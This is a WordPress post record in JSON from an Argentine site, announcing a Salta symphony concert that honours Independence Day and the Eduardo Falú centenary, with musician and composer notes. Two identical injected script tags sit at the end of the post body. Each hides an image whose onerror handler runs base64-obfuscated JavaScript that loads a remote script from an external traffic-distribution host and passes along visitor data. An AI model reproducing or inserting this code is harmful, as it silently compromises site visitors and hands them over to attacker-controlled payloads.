{"id":2830,"date":"2023-07-07T14:32:25","date_gmt":"2023-07-07T17:32:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2830"},"modified":"2025-08-14T00:13:14","modified_gmt":"2025-08-14T03:13:14","slug":"concierto-en-conmemoracion-de-la-independencia-argentina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2830","title":{"rendered":"Concierto en Conmemoraci\u00f3n de la Independencia Argentina"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Bajo la direcci\u00f3n de su director titular, Mtro. Gonzalo Hidalgo, la Sinf\u00f3nica celebrar\u00e1 un nuevo aniversario de la Independencia Argentina.<\/em><\/h3>\n\n\n\n<p>Esta noche, a partir de las 21 horas, la agrupaci\u00f3n orquestal ofrecer\u00e1 un concierto en el marco del Festival Fal\u00fa 100 a\u00f1os, donde se interpretar\u00e1 un programa integrado por obras de diferentes compositores y se destacar\u00e1 principalmente la Suite norte\u00f1a, para guitarra, flauta, corno y cuerdas del compositor argentino. Como solista participar\u00e1 el guitarrista Nicol\u00e1s Vaca.<\/p>\n\n\n\n<p>Completar\u00e1 el programa Lohengrin, Preludio al acto 1 de Richard Wagner, y la Sinfon\u00eda Nro. 7 de Ludwig van Beethoven.<\/p>\n\n\n\n<p>Hoy se cumplen 100 a\u00f1os del natalicio de Eduardo Fal\u00fa, &nbsp;guitarrista y compositor salte\u00f1o, y este concierto se realiza en el marco de las actividades programadas por la Secretar\u00eda de Cultura en su homenaje.<\/p>\n\n\n\n<p>El encuentro tendr\u00e1 lugar en el Teatro Provincial (Zuvir\u00eda 70). La entrada es libre y gratuita sin invitaci\u00f3n y por orden de llegada.<\/p>\n\n\n\n<p><strong>Nicol\u00e1s Vaca, solista<\/strong><\/p>\n\n\n\n<p>Nicol\u00e1s Vaca es guitarrista, docente y gestor cultural de la ciudad de Salta, Argentina. Concertista Internacional de guitarra Argentina. Es director y fundador del Festival internacional de guitarras de Salta, docente de guitarra en la Escuela Superior de M\u00fasica de la provincia, as\u00ed como en instituciones de nivel primario y secundario. Visit\u00f3 pa\u00edses como Bolivia, Per\u00fa y Paraguay llevando el folklore del Norte Argentino en diferentes Festivales internacionales de guitarra. Cuenta con dos producciones discogr\u00e1ficas: La primera \u00abSalte\u00f1o Viejo\u00bb, remasterizada en la ciudad de Cusco, Per\u00fa y la segunda \u00abDel Piano a la guitarra\u00bb trabajo homenaje al pianista y compositor Salte\u00f1o Jos\u00e9 Juan \u00abCoco\u00bb Botelli recibiendo diferentes premios y nominaciones c\u00f3mo la nominaci\u00f3n a mejor \u00e1lbum instrumental en \u00abPremio Mercedes Sosa\u00bb y \u00abPremios Gardel\u00bb. Por su trabajo como concertista recibi\u00f3 numerosas distinciones entre las que destaca \u00abPremio Victoria\u00bb de Uruguay 2020, \u00abDistinci\u00f3n F\u00e9nix\u00bb desde Italia, por su trayectoria como m\u00fasico y docente en el 2020, y el \u00abPremio Atrezzo\u00bb Euroamericano desde Alemania, en el rubro \u00abConcertista de guitarra\u00bb en el a\u00f1o 2021. En Mayo de 2021 fue nombrado socio partner de la UNESCO, en el cual es embajador del \u00abWorld guitar day\u00bb (D\u00eda mundial de la guitarra) en Salta, convirtiendo a esta ciudad en sede oficial del festejo de la mencionada entidad internacional. Actual coordinador de SIMCA (Sociedad Internacional de M\u00fasica de C\u00e1mara Argentina) y miembro de la comisi\u00f3n de Cultura en Fundaci\u00f3n Salta.<\/p>\n\n\n\n<p><strong>Sobre los compositores y las obras<\/strong><\/p>\n\n\n\n<p>Richard Wagner (1813-1883) Compositor, director de orquesta, dramaturgo, poeta y te\u00f3rico musical del Romanticismo. Es conocido por sus \u00f3peras denominadas por \u00e9l mismo \u201cdramas musicales\u201d, en las que asume el libreto y la escenograf\u00eda, como en Lohengrin, El anillo del nibelungo, Trist\u00e1n e Isolda, El holand\u00e9s errante, etc. Transform\u00f3 el pensamiento musical con la idea de la \u00abobra de arte total\u00bb (Gesamtkunstwerk), s\u00edntesis de todas las artes po\u00e9ticas, visuales, musicales y esc\u00e9nicas, que desarrolla a partir de 1842 y que plasm\u00f3 en la primera mitad de su monumental tetralog\u00eda \u201cEl anillo del nibelungo\u201d. Wagner estaba obsesionado sobre lo que \u00e9l consideraba un cr\u00edtico panorama musical en Alemania ocasionado por la comercializaci\u00f3n capitalista. Su influencia se extendi\u00f3 a la filosof\u00eda, la literatura, las artes visuales y el teatro. Hizo construir su propio teatro de \u00f3pera, el Festspielhaus de Bayreuth, para escenificar sus obras, del modo que \u00e9l las imaginaba con sus novedosos dise\u00f1os.<\/p>\n\n\n\n<p>Lohengrin, Preludio al acto 1. Wagner compuso la mayor parte de la obra durante su desempe\u00f1o como segundo Kapellmeister, en Dresde (director general de m\u00fasica para el rey de Sajonia). Al inicio de la revoluci\u00f3n, el compositor se puso del lado de los rebeldes republicanos, pero cuando los soldados prusianos recuperaron el control de la ciudad, debi\u00f3 huir al refugio de Franz Liszt, en Weimar, y luego a Suiza, donde complet\u00f3 Lohengrin, que se lo dedic\u00f3 a Liszt. Este es un relato medieval de caballerosidad y traici\u00f3n que contrasta con la pureza espiritual y la lucha contra el mal y las maquinaciones. El protagonista es un caballero del Grial. El preludio del primer acto representa una visi\u00f3n del descenso del Grial a la tierra. Wagner lo hace con cuerdas brillantes, casi est\u00e1ticas, al principio, las que se hinchan hasta alcanzar un gran cl\u00edmax con el resto de la orquesta cuando el Grial aterriza.<\/p>\n\n\n\n<p>Eduardo Fal\u00fa (1923-2013) Naci\u00f3 en El Galp\u00f3n, Salta. A los catorce a\u00f1os conoci\u00f3 a Arturo D\u00e1valos y a Jaime D\u00e1valos, autor de innumerables poemas a los que music\u00f3. En 1945 inici\u00f3 su carrera profesional en Buenos Aires con el poeta C\u00e9sar Perdiguero, letrista de algunas de sus composiciones. En 1959 grab\u00f3 el LP Fal\u00fa, en Par\u00eds. Ofreci\u00f3 conciertos en Jap\u00f3n, Estados Unidos, Espa\u00f1a, Francia e Inglaterra. Compuso piezas folcl\u00f3ricas de inestimable valor musical y est\u00e9tico, con letras de grandes poetas como Jaime D\u00e1valos, Manuel J. Castilla; Osiris Rodr\u00edguez Castillos, Le\u00f3n Benar\u00f3s, Hamlet Lima Quintana y Marta Mendicute. Compuso otras de car\u00e1cter \u00e9pico como el \u201cRomance de la Muerte de Juan Lavalle\u201d, junto al escritor Ernesto Sabato, y \u201cJos\u00e9 Hern\u00e1ndez\u201d, sobre textos de Jorge Luis Borges. Con su arreglo para guitarra, recopil\u00f3 e hizo famosa la zamba tradicional &amp;quot;La cuartelera&amp;quot;, nacida en el siglo XIX, en los campos de batalla argentinos. Fue Premio Konex de Platino 1985 como Instrumentista de Folklore. En 2011, para 429\u00ba aniversario de la fundaci\u00f3n de la ciudad de Salta fue inaugurado el anfiteatro en su honor. En 2015 recibi\u00f3 con car\u00e1cter p\u00f3stumo otro Premio Konex, el Diploma al M\u00e9rito en la disciplina Instrumentista.<\/p>\n\n\n\n<p>La Suite Norte\u00f1a. En esta obra Fal\u00fa demostr\u00f3 su conocimiento de m\u00fasica acad\u00e9mica, volcada a los ritmos folcl\u00f3ricos, y su alto nivel de int\u00e9rprete en guitarra, al ejecutar esta obra junto a la Camerata Bariloche.<\/p>\n\n\n\n<p>Ludwig van Beethoven (1770-1827) Compositor alem\u00e1n, director de orquesta, pianista y profesor de piano. Es uno de los compositores m\u00e1s importantes de la historia de la m\u00fasica. Su legado musical, que abarca desde el Clasicismo hasta los inicios del Romanticismo, influy\u00f3 en diversidad de obras musicales del S. XIX, en composiciones para piano, m\u00fasica de c\u00e1mara, sacra, lieder, \u00f3pera, ballet, aunque sus Nueve Sinfon\u00edas fueron la fuente principal de su popularidad internacional.<\/p>\n\n\n\n<p>Sinfon\u00eda No. 7 Se estren\u00f3 en un concierto a beneficio de los soldados austr\u00edacos y b\u00e1varos heridos en una batalla contra Napole\u00f3n. Beethoven lo dirigi\u00f3, a pesar de que ya estaba bastante sordo. Fue aclamado con entusiasmo, se hizo popular entre el p\u00fablico y reconocido, incluso entre sus cr\u00edticos, como el compositor vivo m\u00e1s grande del mundo. La famosa descripci\u00f3n de Wagner de esta sinfon\u00eda como \u00abapoteosis de la danza\u00bb;, apunta a su intensa energ\u00eda r\u00edtmica y extraordinario sentido de la invenci\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Bajo la direcci\u00f3n de su director titular, Mtro. Gonzalo Hidalgo, la Sinf\u00f3nica celebrar\u00e1 un nuevo aniversario de la Independencia Argentina. Esta noche, a partir de las 21 horas, la agrupaci\u00f3n orquestal ofrecer\u00e1 un concierto en el marco del Festival Fal\u00fa 100 a\u00f1os, donde se interpretar\u00e1 un programa integrado por obras de diferentes compositores y se [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2831,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2830","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2830"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2830"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2830\/revisions"}],"predecessor-version":[{"id":7032,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2830\/revisions\/7032"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2831"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}